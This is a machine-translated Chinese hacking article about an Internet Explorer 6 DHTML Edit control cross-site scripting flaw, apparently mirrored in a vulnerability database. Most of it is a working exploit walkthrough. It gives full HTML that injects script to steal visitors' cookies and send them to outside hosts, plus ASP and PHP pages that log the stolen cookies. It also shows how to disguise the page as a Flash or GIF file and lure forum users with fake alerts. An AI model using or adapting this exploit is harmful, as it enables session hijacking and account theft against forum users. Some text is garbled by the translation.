MSIE DHTML Edit cross-site scripting vulnerability in-depth use-vulnerability warning-the black bar safety net

2007-09-08T00:00:00
ID MYHACK58:62200716842
Type myhack58
Reporter 佚名
Modified 2007-09-08T00:00:00

Description

MSIE DHTML Edit cross-site scripting vulnerability Microsoft at last released the MSIE DHTML Edit control cross site scripting vulnerability, but the circle has not released a good EXP, got a bunch of newbies Complain incessantly, don't worry, this is not for everyone to feast?!

[Affected system] Microsoft Internet Explorer 6.0 - Microsoft Windows XP Professional SP1 - Microsoft Windows XP Professional - Microsoft Windows XP Home SP1 - Microsoft Windows XP Home - Microsoft Windows ME - Microsoft Windows 9 8 SE - Microsoft Windows 9 8 - Microsoft Windows 2 0 0 0

[Vulnerability description] Microsoft Internet Explorer DHTML edit control incorrectly filtered portion of data, a remote attacker could exploit this vulnerability to conduct cross-site scripting attacks, obtain sensitive information. DHTML edit control there is a security issue may be the parent window access, includes a Script function, an attacker using exeScript is injected directly into the javascript to a control, when the target user opens the malicious link, the malicious script code execution, disclosure of sensitive information. It seems to only affect IE version 6.0 and Windows XP SP2 has no effect, but did not give the XP hit SP2 patch, the user is not in the minority, the vulnerability of the value in use still quite large. Since I'm using Windwos XP SP1 just the existence of this vulnerability, we first test it on a local build the following HTML page: <html> <head> <title>test</title> </head> <body > <object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="8 0 0" height="6 0 0" align="middle" > <PARAM NAME="ActivateApplets" VALUE="1"> <PARAM NAME="ActivateActiveXControls" VALUE="1"> </object> <SCRIPT> function shellscript() { window. name="poorchild"; open("http://www.hacker.com.cn/newbbs/announcements.asp? action=showone&boardid=0","poorchild"); } function main() { x. DOM. Script. execScript(shellscript. toString()); x. DOM. Script. setTimeout("shellscript()"); alert('and so on++++++++++++++++++++++++++'); x. DOM. Script. execScript('alert(document. cookie)'); } </SCRIPT>

</body> </html> Use IE browser to open, if your system has this vulnerability, seen now. Oh, and pop me in the Black anti-Forum on the Cookie information. But this page use up very convenient, and the success rate is not high, if not wait until the DHTML control loads up just click OK, doesn't pop up any Cookie information. Don't wait until the page has finished loading click on the pop-up first determine that a certain attack failed, it seems still insufficient. We come on this page to look at to Supplement and modify it, so that it becomes a high success rate of steal Cookie information of a web page, Well, now we start hands. In order to increase the loading time of our first setTimeout('main()',1 0 0 0)in the parameter change is larger, it is set to 1 0 0 0 0, which is 1 0 seconds, long enough. Although the page display is loaded, but the status bar was showing is complete, we modify the status bar text, add the following function: function clock() { var title="being loaded, please wait++++++++++++++"; status=title; } In order to maximize entice the viewer to open this page, we have it renamed to. swf-format file, i.e. put this page disguised as a Flash file. In the page is added: <object classid="clsid:D27CDB6E-AE6D-11CF-96B8-4 4 4 5 5 3 5 4 0 0 0 0" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,4 0,0" border="0" width="8 0 0" height="6 0 0"> <param name="movie" value="http://www.istacey.net/project/exorcist/icon/promo3.swf"> <param name="quality" value="High"> <embed src="http://www.istacey.net/project/exorcist/icon/promo3.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="4 8 9" height="7 6" quality="High"></object> At the same time hide the DHTML control, the upcoming DHTML space width, and height properties set to 0. To the Cookie is sent, we add the following script: x. DOM. Script. execScript("window. open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document cookie)"); This is in order to test convenience, I will be the viewer's Cookie information is sent to the online a comment. The final test page is: <html> <head> <title>test</title> </head> <body > <object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="0" height="0" align="middle" > <PARAM NAME="ActivateApplets" VALUE="1"> <PARAM NAME="ActivateActiveXControls" VALUE="1"> </object> <SCRIPT> function clock() { var title="being loaded, please wait++++++++++++++"; status=title; }

function shellscript() { window. name="poorchild"; open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild"); } function main() { x. DOM. Script. execScript(shellscript. toString()); x. DOM. Script. setTimeout("shellscript()"); alert("the name of the game: the mystery of the altar\n"); alert("test by those with superhuman powers of observation are!\ n"); alert("the world's only 1 0 individual can all find out!\ n"); alert("believe you that this 1 0 individual is a member of\n"); alert("good luck++++++++++++++++++++\n"); alert("be sure to find different after click on OK it!!!!\ n"); //x. DOM. Script. execScript('alert(document. cookie)'); x. DOM. Script. execScript("window. open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document cookie)"); } </SCRIPT>

<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-4 4 4 5 5 3 5 4 0 0 0 0" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,4 0,0" border="0" width="8 0 0" height="6 0 0"> <param name="movie" value="http://www.istacey.net/project/exorcist/icon/promo3.swf"> <param name="quality" value="High"> <embed src="http://www.istacey.net/project/exorcist/icon/promo3.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="4 8 9" height="7 6" quality="High"></object> </body> </html> One of the http://www. istacey. net/project/exorcist/icon/promo3. swf is a friend sent to my address, take me to the next jump, but didn't think I was using it to cheat on royalties, ha ha. In order to test, go black anti-Forum published an article, to be attractive. Able attractive? I guess the trick a lot! In fact, we can put more attack file renamed into. swf, in order to in the forum to upload easily(do not allow the swf format), I renamed the gif format. Since it is the use of the IE vulnerability, the page address can be in any place, but note: function shellscript() { window. name="poorchild"; open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild"); } This function defines the We have to steal the viewer machine site the Cookie information that I set is black anti-Forum, everyone can be replaced with want to attack the forum. While this page also to select the content of few pages, it is best not to take pictures, to speed up the loading time. Well, I myself would first look at the effect of it.

It seems to be successful, in order not to let the viewer see your Cookie information, you can send it to your own custom ASP page, the method is in support of the ASP and the FSO component of the space established on the following page: <% testfile=Server. MapPath("cookie.txt") cookies=Request("cookie") set fs=server. CreateObject("scripting. filesystemobject") set thisfile=fs. OpenTextFile(testfile,8,True,0) thisfile. WriteLine(""&cookies& "") thisfile. close set fs = nothing %> It will be named Cookie. asp, note modify the following content: x. DOM. Script. execScript("window. open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document cookie)"); Instead x. DOM. Script. execScript("window. open('http://youwebsite.com/cookie.asp?cookie= '+document. cookie)"); Or in support of PHP of space to create the following page: <? php $info = getenv("QUERY_STRING"); if ($info) { $fp = fopen("info.txt","a"); fwrite($fp,$info."\ n"); fclose($fp); }

So by this vulnerability, we can steal to any Forum Cookie information, regardless of the forum made how much security, as long as the viewer IE the presence of this vulnerability, you can successfully get someone's Cookies, which can be called a forum killer!